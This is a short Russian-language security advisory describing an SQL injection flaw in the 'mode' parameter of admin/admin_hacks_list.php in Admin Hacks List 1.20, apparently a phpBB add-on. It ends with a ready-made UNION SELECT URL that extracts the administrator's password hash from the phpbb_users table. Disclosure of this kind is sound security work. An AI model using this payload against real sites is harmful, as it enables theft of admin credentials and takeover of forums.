Программа: Admin Hacks List 1.20
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "mode" сценарием admin/admin_hacks_list.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://[Target]/[Path]/admin/admin_hacks_list.php? mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null %20FROM%20phpbb_users%20 Where%20user_id=2&sid=AdminHash
